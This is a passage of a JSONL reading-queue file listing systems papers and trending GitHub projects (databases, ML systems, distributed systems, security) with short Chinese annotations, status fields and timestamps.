WAL+FIFO+索引足以替代专用引擎。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:35:44.686Z"} +{"slug":"bijou64-varint","area":"papers","topic":"compilers-pl","title":"Bijou64: A variable-length integer encoding","meta":{"col3":"2026","col4":"Ink & Switch 出品;变长 64 位整数编码新方案,对比 LEB128/varint 给出更紧凑且分支预测友好的设计。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:38:46.308Z"} +{"slug":"zig-build-rework","area":"projects","topic":"compilers-pl","title":"Zig Build System Reworked","meta":{"col3":"Zig","col4":"build.zig 大改:把 step graph 拆成纯描述+并发执行;与 Bazel/Buck2 对比能看清声明式 build 架构。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T08:02:07.842Z"} +{"slug":"lfm2-5-8b-a1b-moe","area":"papers","topic":"machine-learning","title":"Liquid AI LFM2.5 8B-A1B MoE Trained on 38T Tokens","meta":{"col3":"2026","col4":"非 Transformer/SSM 混合 MoE,激活 1B 参数;38T token 训练规模公开数据点。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:23:29.372Z"} +{"slug":"yocto-alternatives","area":"papers","topic":"embedded","title":"You probably don't need Yocto, and that's fine","meta":{"col3":"2026","col4":"sigma-star 反共识技术分析:何时 Buildroot/Debian 比 Yocto 更对;附决策矩阵。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:41:02.257Z"} +{"slug":"compiler-perf-left-on-table","area":"papers","topic":"compilers-pl","title":"Leaving performance on the table","meta":{"col3":"2026","col4":"具体 benchmark 展示编译器没用尽的优化机会(PGO、LTO、自动向量化盲区)。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:46:04.716Z"} +{"slug":"rendering-diffs","area":"papers","topic":"editors","title":"On Rendering Diffs","meta":{"col3":"2026","col4":"pierre.computer 写自己 diff viewer 的渲染优化:virtualization、token 级 syntax highlighting。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"pandoc-templates","area":"projects","topic":"editors","title":"Pandoc Templates","meta":{"col3":"Haskell","col4":"Pandoc 模板生态站,把 markdown→PDF/LaTeX/HTML 模板系统化;学术写作/简历自动化。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T08:07:10.958Z"} +{"slug":"openrsync","area":"projects","topic":"operating-systems","title":"Openrsync: An implementation of rsync, by the OpenBSD team","meta":{"col3":"C","col4":"OpenBSD 重写 rsync,BSD 许可、协议兼容;rolling checksum + delta sync 最小可行实现。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T08:07:11.083Z"} +{"slug":"snowboard-kids-2-decomp","area":"projects","topic":"compilers-pl","title":"Snowboard Kids 2 is 100% Decompiled","meta":{"col3":"C","col4":"N64 完整反编译里程碑;matching decomp 工作流(mips_to_c、splat、ido recompiler)。"},"url":"","status":"queued","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"mcp-is-dead-debate","area":"papers","topic":"backend-api","title":"MCP is dead?","meta":{"col3":"2026","col4":"quandri 工程博客对 Model Context Protocol 局限的批评(schema 漂移、stdin/stdout 限制)。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T03:54:57.269Z"} +{"slug":"hekaton","area":"papers","topic":"databases","title":"Hekaton: SQL Server's Memory-Optimized OLTP Engine","meta":{"col3":"2013","col4":"CMU 15-721 多周引用;MVCC + lock-free + native compilation 工业首发。High priority distsys/db classic。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} +{"slug":"bw-tree","area":"papers","topic":"databases","title":"The Bw-Tree: A B-tree for New Hardware Platforms","meta":{"col3":"2013","col4":"CMU 15-721 索引专题;lock-free B-tree + log-structured page store。High priority。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:01:26.265Z"} +{"slug":"wisckey","area":"papers","topic":"databases","title":"WiscKey: Separating Keys from Values in SSD-conscious Storage","meta":{"col3":"2016","col4":"FAST'16 best paper;解释 RocksDB write-amplification 根源 + Titan/BlobDB 设计动机。High priority。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:06:28.434Z"} +{"slug":"oltp-looking-glass","area":"papers","topic":"databases","title":"OLTP Through the Looking Glass, and What We Found There","meta":{"col3":"2008","col4":"Stonebraker 拆解 90% 时间在 buffer/lock/log;H-Store/VoltDB/Hekaton/SiloR 共同前提。High priority。"},"url":"","status":"written","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30","written_at":"2026-06-13T04:11:30.600Z"} +{"slug":"llmsurgeon-data-mixture","area":"papers","topic":"machine-learning","title":"LLMSurgeon: Diagnosing Data Mixture of Large Language Models","meta":{"col3":"2026","col4":"arXiv 2605.30348;从生成文本反推预训练数据 domain 分布;data provenance auditing 新框架。"},"url":"https://arxiv.org/abs/2605.30348","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"rim-latent-reasoning","area":"papers","topic":"machine-learning","title":"Reasoning in Memory: Unlocking the Working Memory of LLMs for Latent Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30343;用固定 memory token 替代 autoregressive CoT;Hochreiter 团队。"},"url":"https://arxiv.org/abs/2605.30343","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:28:33.762Z"} +{"slug":"hullft-ttft","area":"papers","topic":"machine-learning","title":"HullFT: Efficient Test-Time Finetuning via Convex Reconstruction and Gradient Caching","meta":{"col3":"2026","col4":"arXiv 2605.30337;Frank-Wolfe 投影 + gradient reuse;TTFT 质量-速度新前沿。"},"url":"https://arxiv.org/abs/2605.30337","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:33:36.051Z"} +{"slug":"compositional-incoherence","area":"papers","topic":"machine-learning","title":"Locally Coherent, Globally Incoherent: Bounding Compositional Incoherence in Multi-Component LLM Agents","meta":{"col3":"2026","col4":"arXiv 2605.30335;多 LLM 组件违反概率公理;Boyle-Dykstra projection 修复。"},"url":"https://arxiv.org/abs/2605.30335","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:37:39.577Z"} +{"slug":"demystifying-data-org","area":"papers","topic":"machine-learning","title":"Demystifying Data Organization for Enhanced LLM Training","meta":{"col3":"2026","col4":"arXiv 2605.30334;4 条数据排序原则 + STR/SAW;Microsoft data-efficacy 项目。"},"url":"https://arxiv.org/abs/2605.30334","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:41:59.550Z"} +{"slug":"compose-future-theorems","area":"papers","topic":"machine-learning","title":"COMPOSE: Composing Future Theorems from Citations and Formal Structure","meta":{"col3":"2026","col4":"arXiv 2605.30333;arXiv + Mathlib 双图条件生成;108K paired examples 数据集。"},"url":"https://arxiv.org/abs/2605.30333","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:43:14.768Z"} +{"slug":"soundness-bench","area":"papers","topic":"machine-learning","title":"SoundnessBench: Can Your AI Scientist Really Tell Good Research Ideas from Bad Ones?","meta":{"col3":"2026","col4":"arXiv 2605.30329;1099 ICLR 提案 soundness 评估;frontier LLM 普遍存在 optimism bias。"},"url":"https://arxiv.org/abs/2605.30329","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"resolution-diagnostics-llm","area":"papers","topic":"machine-learning","title":"Resolution Diagnostics for Paired LLM Evaluation","meta":{"col3":"2026","col4":"arXiv 2605.30315;Open LLM Leaderboard 27% 排名未达统计 resolution;常用 calculator 偏差 ~2x。"},"url":"https://arxiv.org/abs/2605.30315","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:49:11.197Z"} +{"slug":"mira-rubric","area":"papers","topic":"machine-learning","title":"MIRA: Mid-training Rubric Anchoring for Source-Aware Data Selection","meta":{"col3":"2026","col4":"arXiv 2605.30288;mid-training 阶段 self-anchored rubric discovery;半 token 匹配全语料。"},"url":"https://arxiv.org/abs/2605.30288","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:54:13.779Z"} +{"slug":"projection-bench","area":"papers","topic":"machine-learning","title":"ProjectionBench: Evaluating Scientific Hypothesis Generation in LLMs Under Progressive Information Disclosure","meta":{"col3":"2026","col4":"arXiv 2605.30284;逐步揭示信息测假说生成;GPT-5.4/Gemini 3.1 pro F1=0.7 minimal context。"},"url":"https://arxiv.org/abs/2605.30284","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:58:40.300Z"} +{"slug":"loong-doc-mt","area":"papers","topic":"machine-learning","title":"Loong: Human-Like Long Document Translation Agent with Adaptive Context Selection","meta":{"col3":"2026","col4":"arXiv 2605.30274;3E memory module;EN<->ZH/DE/FR 平均 +13.0 metric points。"},"url":"https://arxiv.org/abs/2605.30274","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T05:02:26.484Z"} +{"slug":"mem-ft-lora","area":"papers","topic":"machine-learning","title":"How LoRA Remembers? A Parametric Memory Law for LLM Finetuning","meta":{"col3":"2026","col4":"arXiv 2605.30260;ΔLoss vs effective params 幂律;token-level p>0.5 phase transition;MemFT 优化。"},"url":"https://arxiv.org/abs/2605.30260","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T05:06:03.573Z"} +{"slug":"ccopd-distillation","area":"papers","topic":"machine-learning","title":"CCOPD: Canonical-Context On-Policy Distillation for Multi-Turn Language Models","meta":{"col3":"2026","col4":"arXiv 2605.30251;同 evidence 不同呈现导致 self-anchored drift;32% relative improvement。"},"url":"https://arxiv.org/abs/2605.30251","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T05:08:39.558Z"} +{"slug":"codegraph-claude-code","area":"projects","topic":"devtools","title":"colbymchenry/codegraph: Pre-indexed code knowledge graph for Claude Code/Codex/Cursor","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;为 coding agent 提供 indexed graph context。"},"url":"https://github.com/colbymchenry/codegraph","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"anthropic-financial-services","area":"projects","topic":"backend-api","title":"anthropics/financial-services: Financial services workflows on Claude","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;Anthropic 官方金融场景 cookbook + agent 模板。"},"url":"https://github.com/anthropics/financial-services","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"cloak-browser","area":"projects","topic":"security-privacy","title":"CloakHQ/CloakBrowser: Stealth Chromium passing bot-detection (Playwright drop-in)","meta":{"col3":"2026","col4":"GitHub trending 30d;fingerprint patches;Playwright 兼容;scraping/automation。"},"url":"https://github.com/CloakHQ/CloakBrowser","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"understand-anything-graph","area":"projects","topic":"devtools","title":"Lum1104/Understand-Anything: Interactive knowledge graph for code exploration","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;visualize codebase as queryable graph。"},"url":"https://github.com/Lum1104/Understand-Anything","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"agent-memory","area":"projects","topic":"machine-learning","title":"rohitg00/agentmemory: Persistent memory system for AI coding agents","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;benchmarked memory backend;session 持久化。"},"url":"https://github.com/rohitg00/agentmemory","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"academic-research-skills","area":"projects","topic":"devtools","title":"Imbad0202/academic-research-skills: Research workflow automation for Claude Code","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;学术写作/调研 skill 集合。"},"url":"https://github.com/Imbad0202/academic-research-skills","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"mattpocock-skills","area":"projects","topic":"devtools","title":"mattpocock/skills: Engineering skills reference collection","meta":{"col3":"2026","col4":"GitHub trending 30d;Shell;Matt Pocock 整理的工程实践 skill 库。"},"url":"https://github.com/mattpocock/skills","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"ai-engineering-scratch","area":"projects","topic":"machine-learning","title":"rohitg00/ai-engineering-from-scratch: Building and shipping AI systems","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;端到端 AI 系统从零搭建教程。"},"url":"https://github.com/rohitg00/ai-engineering-from-scratch","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"nine-router","area":"projects","topic":"devtools","title":"decolua/9router: AI coding tool connector with multi-provider auto-fallback","meta":{"col3":"2026","col4":"GitHub trending 30d;JavaScript;多 LLM provider 路由 + 故障切换。"},"url":"https://github.com/decolua/9router","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"ruflo-claude","area":"projects","topic":"machine-learning","title":"ruvnet/ruflo: Multi-agent orchestration platform for Claude","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;agent workflow orchestration framework。"},"url":"https://github.com/ruvnet/ruflo","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"bytedance-ui-tars","area":"projects","topic":"machine-learning","title":"bytedance/UI-TARS-desktop: Multimodal AI agent stack","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;连接 vision-language model 与 desktop infra。"},"url":"https://github.com/bytedance/UI-TARS-desktop","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"andrej-karpathy-skills","area":"projects","topic":"devtools","title":"multica-ai/andrej-karpathy-skills: Claude Code behavior tuning guide","meta":{"col3":"2026","col4":"GitHub trending 30d;Karpathy 风格的 coding agent prompt/skill 集。"},"url":"https://github.com/multica-ai/andrej-karpathy-skills","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"maigret-osint","area":"projects","topic":"security-privacy","title":"soxoj/maigret: OSINT username search across 3000+ sites","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;按 username 收集人物资料;红队/调研工具。"},"url":"https://github.com/soxoj/maigret","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"domain-expertise-real-moat","area":"projects","topic":"engineering-culture","title":"Domain expertise has always been the real moat","meta":{"col3":"2026","col4":"HN best 30d 539 pts;后 LLM 时代护城河讨论;适合 daily reflection。"},"url":"https://www.brethorsting.com/blog/2026/05/domain-expertise-has-always-been-the-real-moat/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"zig-build-system-reworked","area":"projects","topic":"compilers-pl","title":"Zig: Build System Reworked (devlog 2026-05-26)","meta":{"col3":"2026","col4":"HN best 30d 350 pts;Zig 0.x build graph 重写;学习现代 build system 设计。"},"url":"https://ziglang.org/devlog/2026/#2026-05-26","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"rendering-diffs-pierre","area":"projects","topic":"dataviz","title":"On Rendering Diffs (Pierre)","meta":{"col3":"2026","col4":"HN best 30d 204 pts;diff 渲染算法 + UX;适合 frontend/devtool 学习。"},"url":"https://pierre.computer/writing/on-rendering-diffs","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"liquid-ai-lfm2-moe","area":"projects","topic":"machine-learning","title":"Liquid AI LFM2-5: 8B-A1B MoE trained on 38T tokens","meta":{"col3":"2026","col4":"HN best 30d 241 pts;新一代 MoE 开源模型;架构 + 训练数据规模。"},"url":"https://www.liquid.ai/blog/lfm2-5-8b-a1b","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"frontend-lost-decade-ai","area":"projects","topic":"engineering-culture","title":"Is AI causing a repeat of frontend's lost decade?","meta":{"col3":"2026","col4":"HN 30d 399 pts;mastrojs 反思 AI 时代 frontend 复杂度回潮。"},"url":"https://mastrojs.github.io/blog/2026-05-23-is-AI-causing-a-repeat-of-frontends-lost-decade/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"compile-quake-1997","area":"projects","topic":"compilers-pl","title":"Let's compile Quake like it's 1997 (Fabien Sanglard)","meta":{"col3":"2026","col4":"HN 30d 219 pts;DOS toolchain 重现 Quake 编译;优秀经典 build/PL 教学。"},"url":"https://fabiensanglard.net/compile_like_1997/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"various-llm-smells","area":"projects","topic":"machine-learning","title":"Various LLM Smells","meta":{"col3":"2026","col4":"HN 30d 364 pts;LLM 代码生成异味目录;类比 code smells。"},"url":"https://shvbsle.in/various-llm-smells/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"lakehouse-2021","area":"papers","topic":"databases","title":"Lakehouse: A New Generation of Open Platforms that Unify Data Warehousing and Advanced Analytics","meta":{"col3":"2021","col4":"CMU 15-721 syllabus;Databricks/Zaharia;现代 data platform 架构定义性论文。"},"url":"https://www.cidrdb.org/cidr2021/papers/cidr2021_paper17.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"columnar-storage-formats-2023","area":"papers","topic":"databases","title":"An Empirical Evaluation of Columnar Storage Formats","meta":{"col3":"2023","col4":"CMU 15-721;Parquet/ORC/Arrow 实证对比;理解列存格式权衡的必读。"},"url":"https://www.vldb.org/pvldb/vol17/p148-zeng.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:20:08.763Z"} +{"slug":"fastlanes-compression","area":"papers","topic":"databases","title":"The FastLanes Compression Layout: Decoding >100B Integers per Second with Scalar Code","meta":{"col3":"2023","col4":"CMU 15-721;CWI;列存压缩 SIMD-friendly 布局;DuckDB 采用基础。"},"url":"https://www.vldb.org/pvldb/vol16/p2132-afroozeh.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"velox-meta-2022","area":"papers","topic":"databases","title":"Velox: Meta's Unified Execution Engine","meta":{"col3":"2022","col4":"VLDB'22;Meta 统一 Presto/Spark/Pandas 执行后端;现代 vectorized engine 工业化案例。"},"url":"https://www.vldb.org/pvldb/vol15/p3372-pedreira.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:33:33.917Z"} +{"slug":"morsel-driven-2014","area":"papers","topic":"databases","title":"Morsel-Driven Parallelism: A NUMA-Aware Query Evaluation Framework","meta":{"col3":"2014","col4":"SIGMOD'14;HyPer/Umbra 调度核心;many-core 时代 query parallelism 标准范式。"},"url":"https://db.in.tum.de/~leis/papers/morsels.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:38:07.236Z"} +{"slug":"efficient-compile-2011","area":"papers","topic":"databases","title":"Efficiently Compiling Efficient Query Plans for Modern Hardware","meta":{"col3":"2011","col4":"VLDB'11;Neumann;data-centric query compilation;HyPer/Umbra 路线起点。"},"url":"https://www.vldb.org/pvldb/vol4/p539-neumann.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:41:59.557Z"} +{"slug":"wco-joins-relational-2020","area":"papers","topic":"databases","title":"Adopting Worst-Case Optimal Joins in Relational Database Systems","meta":{"col3":"2020","col4":"CMU 15-721;WCOJ 进入 RDBMS;图模式查询性能突破基础。"},"url":"https://www.vldb.org/pvldb/vol13/p1891-freitag.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:43:14.775Z"} +{"slug":"dremel-decade-2020","area":"papers","topic":"databases","title":"Dremel: A Decade of Interactive SQL Analysis at Web Scale","meta":{"col3":"2020","col4":"VLDB'20;Google 回顾 Dremel 十年演进;BigQuery 设计依据。"},"url":"https://research.google/pubs/dremel-a-decade-of-interactive-sql-analysis-at-web-scale/","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} +{"slug":"farm-2015","area":"papers","topic":"distributed-systems","title":"FaRM: Fast Remote Memory","meta":{"col3":"2014","col4":"NSDI'14;MSR;RDMA + 1-sided reads;现代低延迟存储系统起点。"},"url":"https://www.microsoft.com/en-us/research/publication/farm-fast-remote-memory/","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:48:20.008Z"} +{"slug":"ray-2018","area":"papers","topic":"distributed-systems","title":"Ray: A Distributed Framework for Emerging AI Applications","meta":{"col3":"2018","col4":"OSDI'18;Berkeley;actor + task model 统一;现代 LLM training/inference 编排底座。"},"url":"https://www.usenix.org/conference/osdi18/presentation/moritz","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:52:07.507Z"} +{"slug":"on-demand-container-loading","area":"papers","topic":"distributed-systems","title":"On-demand Container Loading in AWS Lambda","meta":{"col3":"2023","col4":"USENIX ATC'23;Lambda 启动 GB-级镜像 sub-second;现代 serverless 冷启动工程。"},"url":"https://www.usenix.org/conference/atc23/presentation/brooker","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31","written_at":"2026-06-13T04:54:13.786Z"} +{"slug":"paged-attention-vllm","area":"papers","topic":"ml-systems","title":"Efficient Memory Management for Large Language Model Serving with PagedAttention","meta":{"col3":"2023","col4":"Kwon et al. SOSP'23;vLLM 核心机制:把 GPU 显存当 OS 页表管 KV cache,直接催生 vLLM/SGLang/TensorRT-LLM 整代推理引擎"},"url":"https://arxiv.org/abs/2309.06180","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T04:58:40.327Z"} +{"slug":"flashattention-2","area":"papers","topic":"ml-systems","title":"FlashAttention-2: Faster Attention with Better Parallelism","meta":{"col3":"2023","col4":"Tri Dao;用 work partitioning 重排把 IO-aware attention 推到 A100 接近峰值,已是所有现代训练/推理 stack 的默认实现"},"url":"https://arxiv.org/abs/2307.08691","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:02:13.016Z"} +{"slug":"flashattention-3-2024","area":"papers","topic":"ml-systems","title":"FlashAttention-3: Fast and Accurate Attention with Asynchrony and Low-Precision","meta":{"col3":"2024","col4":"Hopper 上利用 WGMMA + FP8 + warp specialization;H100 attention 实测达峰值 75%;TMA 异步流水范本"},"url":"https://arxiv.org/abs/2407.08608","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:03:37.130Z"} +{"slug":"megatron-core-moe-2026","area":"papers","topic":"ml-systems","title":"Scalable Training of Mixture-of-Experts Models with Megatron Core","meta":{"col3":"2026","col4":"NVIDIA 系统综述:MoE 训练全栈优化(recompute/offload/Grouped GEMM/CUDA Graphs/FP8);DeepSeek-V3-685B 1233 TFLOPS"},"url":"https://arxiv.org/abs/2603.07685","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:07:29.105Z"} +{"slug":"vescale-fsdp-2026","area":"papers","topic":"ml-systems","title":"veScale-FSDP: Flexible and High-Performance FSDP at Scale","meta":{"col3":"2026","col4":"字节自研 FSDP;RaggedShard 结构感知分片支持 block-quant/Shampoo/Muon;万卡级 5–66% 吞吐提升"},"url":"https://arxiv.org/abs/2602.22437","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:11:06.534Z"} +{"slug":"qserve-w4a8kv4-2024","area":"papers","topic":"ml-systems","title":"QServe: W4A8KV4 Quantization and System Co-design for Efficient LLM Serving","meta":{"col3":"2024","col4":"Song Han;揭穿 INT4 在云端 batch 上的 dequant overhead,提出渐进量化 + SmoothAttention,实测 Llama-3 1.4x"},"url":"https://arxiv.org/abs/2405.04532","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"expertflow-moe-offload","area":"papers","topic":"ml-systems","title":"ExpertFlow: Efficient MoE Inference via Predictive Expert Caching","meta":{"col3":"2024","col4":"解决 MoE 部署内存爆炸:路由预测 + token 调度 + 预测式 expert cache;93.7% 显存削减 10x throughput"},"url":"https://arxiv.org/abs/2410.17954","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:18:45.148Z"} +{"slug":"nexus-prefill-decode-intra-gpu","area":"papers","topic":"ml-systems","title":"Nexus: Proactive Intra-GPU Disaggregation of Prefill and Decode","meta":{"col3":"2025","col4":"在单 GPU 内动态切 prefill/decode 资源;vLLM 上 2.2x 吞吐 / 20x TTFT;引入饱和与带宽争用模型"},"url":"https://arxiv.org/abs/2507.06608","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:22:27.578Z"} +{"slug":"liger-kernel-llm-training","area":"papers","topic":"ml-systems","title":"Liger Kernel: Efficient Triton Kernels for LLM Training","meta":{"col3":"2024","col4":"LinkedIn 开源 Triton kernel 套件;fused chunked CE/RMSNorm 等带来 20% 训练吞吐 + 60% 显存节省"},"url":"https://arxiv.org/abs/2410.10989","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:27:16.557Z"} +{"slug":"triton-anatomy-paged-attn","area":"papers","topic":"ml-systems","title":"The Anatomy of a Triton Attention Kernel","meta":{"col3":"2025","col4":"把 paged attention 用纯 Triton 写到 NVIDIA/AMD 上 SOTA 105.9%;可移植 LLM 推理 kernel 编写范本"},"url":"https://arxiv.org/abs/2511.11581","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"speculative-decoding-leviathan-2023","area":"papers","topic":"ml-systems","title":"Fast Inference from Transformers via Speculative Decoding","meta":{"col3":"2023","col4":"Leviathan-Kalman;speculative decoding 起源论文,draft+verify 推理范式被 vLLM/TGI/EAGLE 等普遍继承"},"url":"https://arxiv.org/abs/2211.17192","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:34:02.902Z"} +{"slug":"tensorrt-llm-overview","area":"papers","topic":"ml-systems","title":"NVIDIA TensorRT-LLM: An Open-Source Library for Optimizing LLM Inference","meta":{"col3":"2024","col4":"NVIDIA 官方推理库技术报告;CUDA Graph + 多种 attention impl + chunked prefill + in-flight batching"},"url":"https://github.com/NVIDIA/TensorRT-LLM","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:39:05.202Z"} +{"slug":"sglang-radixattention","area":"papers","topic":"ml-systems","title":"SGLang: Efficient Execution of Structured Language Model Programs","meta":{"col3":"2024","col4":"Lianmin Zheng;RadixAttention 自动复用 KV prefix;编程模型 + 运行时一体化,对 agent/tool-use workload 关键"},"url":"https://arxiv.org/abs/2312.07104","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"ds-zero-pp-comm","area":"papers","topic":"ml-systems","title":"ZeRO++: Extremely Efficient Collective Communication for Giant Model Training","meta":{"col3":"2024","col4":"DeepSpeed ZeRO++ 系列:低精度通信 + hierarchical partitioning,把跨机带宽瓶颈削 4x;多机训练标配"},"url":"https://arxiv.org/abs/2306.10209","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:48:51.989Z"} +{"slug":"rsa-1978","area":"papers","topic":"security-privacy","title":"A Method for Obtaining Digital Signatures and Public-Key Cryptosystems","meta":{"col3":"1978","col4":"Rivest-Shamir-Adleman;非对称密码学的开山论文,所有 PKI/TLS/PGP 的祖宗"},"url":"https://people.csail.mit.edu/rivest/Rsapaper.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:11:06.552Z"} +{"slug":"noise-protocol-framework","area":"papers","topic":"security-privacy","title":"The Noise Protocol 